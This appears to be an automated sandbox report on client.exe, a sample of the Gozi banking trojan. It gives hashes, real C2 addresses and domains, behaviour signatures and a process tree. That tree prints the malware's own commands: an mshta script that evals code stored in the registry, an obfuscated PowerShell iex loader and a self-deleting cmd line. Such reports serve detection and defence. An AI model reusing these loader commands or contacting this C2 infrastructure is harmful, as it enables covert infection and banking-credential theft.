Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2023 13:48

General

  • Target

    client.exe

  • Size

    296KB

  • MD5

    3f39517fb0f5de4ba10e72242fb6cd9a

  • SHA1

    d9c68d8110038c21b9d1c5763eab9331c2cf3b45

  • SHA256

    b3a2a819e27b004310e65c2b6b000cb8444b3233271a5064e5314d9580d128d3

  • SHA512

    c69a9438a9915724233aff2a45a25421a33d05ff2fdcaa7ffdef7dd67f2c27aa1f0894e1c0b11def837d01515dbf42931d4ac829a0ea6a40b115002e615f7ebe

  • SSDEEP

    3072:pqrRrmv3TwaCRNnA/UeXFa3mSRACC2IS/gc/LRxNuIY:QrRyvDwaCRNn4XQ2wACZgc/LR/u

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

185.247.184.139

62.72.33.155

incontroler.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3872
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4616
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:4088
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3308
        • C:\Users\Admin\AppData\Local\Temp\client.exe
          "C:\Users\Admin\AppData\Local\Temp\client.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:236
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 236 -s 480
            3⤵
            • Program crash
            PID:4992
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ke8w='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ke8w).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\304F83E1-CF18-E2AF-D964-73361DD857CA\\\OperatorAbout'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3880
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nqtsdiu -value gp; new-alias -name xgqmke -value iex; xgqmke ([System.Text.Encoding]::ASCII.GetString((nqtsdiu "HKCU:Software\AppDataLow\Software\Microsoft\304F83E1-CF18-E2AF-D964-73361DD857CA").ClassDocument))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2780
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0tm0a2ea\0tm0a2ea.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:5012
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE261.tmp" "c:\Users\Admin\AppData\Local\Temp\0tm0a2ea\CSCA32CE5F9200B4C1B923FF58A2CB2F0C.TMP"
                5⤵
                  PID:4864
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\umefazm3\umefazm3.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2364
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE399.tmp" "c:\Users\Admin\AppData\Local\Temp\umefazm3\CSC92D4FA6E44684D459016DBE44B8141DE.TMP"
                  5⤵
                    PID:828
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:4648
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:4964
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:4736
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:3500
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 236 -ip 236
              1⤵
                PID:4104

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\0tm0a2ea\0tm0a2ea.dll
                Filesize

                3KB

                MD5

                1a325eea4dc1462f5578ad42eea53e24

                SHA1

                e3a94dcbcbffc75a864f77cf1ae5ec99205d6418

                SHA256

                cfa471f5a799000ec2fe6aeb0abf58013631402bcfbab9b346cb98b34171650b

                SHA512

                60dab39726acbf0c9b78d1e78a67bf2197ea58d7da921908823c74ce6d56d576f63d4c79de6eb5aa54deca6294d70e744c26ac6963990a198c54be2ba9db59ce

              • C:\Users\Admin\AppData\Local\Temp\RESE261.tmp
                Filesize

                1KB

                MD5

                6ca6bace3a69a7054a5be1ccade483dd

                SHA1

                7a80967f95cc637939ab961de41c09b4ecdf8180

                SHA256

                93b78898ffdcbb4c41df8b5e7f6a37e6c3c4e0bbb46162d28230c47ba96c23a8

                SHA512

                856e4baf42cc5a025c70ffc4f5e241e8b6d4da382f8d97a78078136dc21e81cb0b931fcaa5d1be8bd4788d1db944f52cc54607b3f2af9742de888bdff4d41a1d

              • C:\Users\Admin\AppData\Local\Temp\RESE399.tmp
                Filesize

                1KB

                MD5

                9131d71a29d44f10257a77c1ce469c65

                SHA1

                4dfaf0962eaac9f7fe5a073264cb8cf68fb6eff3

                SHA256

                7d71621e3b5660535aa9e3749aa6a46016b11fe0137ceeca62fae60de32fb413

                SHA512

                a42fe86d09cbda98c203d179577a31cdcb3dd0a9987cc37758b2411b994e9cc0a89e0c245463b5a7bbdcea090fa6ac508ff7c4255edb2efe5d459052f2eeadc9

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qrgjydpv.o0d.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\umefazm3\umefazm3.dll
                Filesize

                3KB

                MD5

                522599d3f511a74c887bd371404ca624

                SHA1

                a87c199286b109afe23cd92f631f1d024843b41a

                SHA256

                a24ddfe35b052b704b77672b148ca7d741425a8720932c015e718397a99fcee1

                SHA512

                bbead8461ff82ac04b4524997ae0011e31936a8096a50b670b51cc7a476e11ca2375578517e423ee4f080ac7995125da2b35424db0bf5af1cf7f7324f256f7ae

              • \??\c:\Users\Admin\AppData\Local\Temp\0tm0a2ea\0tm0a2ea.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

              • \??\c:\Users\Admin\AppData\Local\Temp\0tm0a2ea\0tm0a2ea.cmdline
                Filesize

                369B

                MD5

                06a39cd16585515c9f5ace55a53f758e

                SHA1

                7162023f176726571b264e9e9bc1532ff4c99b3d

                SHA256

                61f5773ddb6b84cd54d675ffd09dd14e637b769d44077c5568cde0f7eb61534b

                SHA512

                5bd68ba3aa680312bbcf669cd815738b805d3388544e9ea6e6757a34e3cbb66755a4609de4b17ee65bca8ed85e7978d81745aa5a581aa9cde36eb814c527582b

              • \??\c:\Users\Admin\AppData\Local\Temp\0tm0a2ea\CSCA32CE5F9200B4C1B923FF58A2CB2F0C.TMP
                Filesize

                652B

                MD5

                cfffb3459e6dd5325eced4501a927bba

                SHA1

                5aa1b15701a35a27831be005618fb299910398c8

                SHA256

                4f90f9ebe95ebd7d49d410e94b846d11dc8d28d217be0d01635b7ad77a19fbe3

                SHA512

                dfcdf5ec2d685d693d32b7f7d19fe5128b8bd73b11dbe88f5565355f2b1735826b8daf9baea35669e3906d00b1c0349e88e526617aeebc2515eabfe243051f62

              • \??\c:\Users\Admin\AppData\Local\Temp\umefazm3\CSC92D4FA6E44684D459016DBE44B8141DE.TMP
                Filesize

                652B

                MD5

                ac4024fc22c90a1263fe90017ce6902a

                SHA1

                b2646a9cc3d6a391adb2a47af3e1bf47e5f9e30c

                SHA256

                c2ade8222657995d4bd70a302ce48f90cd2fab5ccaeef69e89313f00116ad30c

                SHA512

                6b970832be79d4884581b09e53837c01d466a5245391cdc95ecd908fc2844d4db63ba7beda194faff33c0e97706bb82ed59fb0f6e32d0c42a290b3064e6d847b

              • \??\c:\Users\Admin\AppData\Local\Temp\umefazm3\umefazm3.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

              • \??\c:\Users\Admin\AppData\Local\Temp\umefazm3\umefazm3.cmdline
                Filesize

                369B

                MD5

                1a192f4bde322bc5deca55b66cb85a51

                SHA1

                fb264be1eec4c2359b0eea32efec524b763c886d

                SHA256

                e2172792584b9b99a81a739190b347a197323026dd1eec013b521ebb6b8fe432

                SHA512

                5163065c72179bff52f15b352ee0810f4cad2ce2c5aa5efbd29a7e0715db5edee707542bcfb3cba4a501402718de92598d197d22b0dc28e9875032f308308a22

              • memory/236-113-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

              • memory/236-2-0x00000000023F0000-0x00000000023FB000-memory.dmp
                Filesize

                44KB

              • memory/236-7-0x0000000002450000-0x0000000002550000-memory.dmp
                Filesize

                1024KB

              • memory/236-1-0x0000000002450000-0x0000000002550000-memory.dmp
                Filesize

                1024KB

              • memory/236-4-0x0000000004000000-0x000000000400D000-memory.dmp
                Filesize

                52KB

              • memory/236-3-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

              • memory/236-9-0x0000000000400000-0x0000000002290000-memory.dmp
                Filesize

                30.6MB

              • memory/236-8-0x00000000023F0000-0x00000000023FB000-memory.dmp
                Filesize

                44KB

              • memory/2780-25-0x000001F5E19D0000-0x000001F5E19E0000-memory.dmp
                Filesize

                64KB

              • memory/2780-38-0x000001F5F9F70000-0x000001F5F9F78000-memory.dmp
                Filesize

                32KB

              • memory/2780-24-0x000001F5E19D0000-0x000001F5E19E0000-memory.dmp
                Filesize

                64KB

              • memory/2780-52-0x000001F5FA0D0000-0x000001F5FA0D8000-memory.dmp
                Filesize

                32KB

              • memory/2780-23-0x00007FFD7F500000-0x00007FFD7FFC1000-memory.dmp
                Filesize

                10.8MB

              • memory/2780-54-0x000001F5FA0E0000-0x000001F5FA11D000-memory.dmp
                Filesize

                244KB

              • memory/2780-13-0x000001F5F9F20000-0x000001F5F9F42000-memory.dmp
                Filesize

                136KB

              • memory/2780-66-0x000001F5FA0E0000-0x000001F5FA11D000-memory.dmp
                Filesize

                244KB

              • memory/2780-63-0x00007FFD7F500000-0x00007FFD7FFC1000-memory.dmp
                Filesize

                10.8MB

              • memory/3308-57-0x00000000012B0000-0x00000000012B1000-memory.dmp
                Filesize

                4KB

              • memory/3308-103-0x00000000090E0000-0x0000000009184000-memory.dmp
                Filesize

                656KB

              • memory/3308-56-0x00000000090E0000-0x0000000009184000-memory.dmp
                Filesize

                656KB

              • memory/3500-93-0x00000266C2240000-0x00000266C22E4000-memory.dmp
                Filesize

                656KB

              • memory/3500-95-0x00000266C1D40000-0x00000266C1D41000-memory.dmp
                Filesize

                4KB

              • memory/3500-119-0x00000266C2240000-0x00000266C22E4000-memory.dmp
                Filesize

                656KB

              • memory/3872-71-0x0000021048960000-0x0000021048961000-memory.dmp
                Filesize

                4KB

              • memory/3872-114-0x000002104B200000-0x000002104B2A4000-memory.dmp
                Filesize

                656KB

              • memory/3872-70-0x000002104B200000-0x000002104B2A4000-memory.dmp
                Filesize

                656KB

              • memory/4088-78-0x0000025151240000-0x0000025151241000-memory.dmp
                Filesize

                4KB

              • memory/4088-75-0x0000025151C00000-0x0000025151CA4000-memory.dmp
                Filesize

                656KB

              • memory/4088-115-0x0000025151C00000-0x0000025151CA4000-memory.dmp
                Filesize

                656KB

              • memory/4616-118-0x000001F6C0F00000-0x000001F6C0FA4000-memory.dmp
                Filesize

                656KB

              • memory/4616-88-0x000001F6C07A0000-0x000001F6C07A1000-memory.dmp
                Filesize

                4KB

              • memory/4616-86-0x000001F6C0F00000-0x000001F6C0FA4000-memory.dmp
                Filesize

                656KB

              • memory/4648-116-0x000002EB99790000-0x000002EB99834000-memory.dmp
                Filesize

                656KB

              • memory/4648-81-0x000002EB99840000-0x000002EB99841000-memory.dmp
                Filesize

                4KB

              • memory/4648-79-0x000002EB99790000-0x000002EB99834000-memory.dmp
                Filesize

                656KB

              • memory/4736-112-0x0000000000DA0000-0x0000000000E38000-memory.dmp
                Filesize

                608KB

              • memory/4736-107-0x00000000005F0000-0x00000000005F1000-memory.dmp
                Filesize

                4KB

              • memory/4736-106-0x0000000000DA0000-0x0000000000E38000-memory.dmp
                Filesize

                608KB

              • memory/4964-117-0x00000224E6140000-0x00000224E61E4000-memory.dmp
                Filesize

                656KB

              • memory/4964-105-0x00000224E5F40000-0x00000224E5F41000-memory.dmp
                Filesize

                4KB

              • memory/4964-102-0x00000224E6140000-0x00000224E61E4000-memory.dmp
                Filesize

                656KB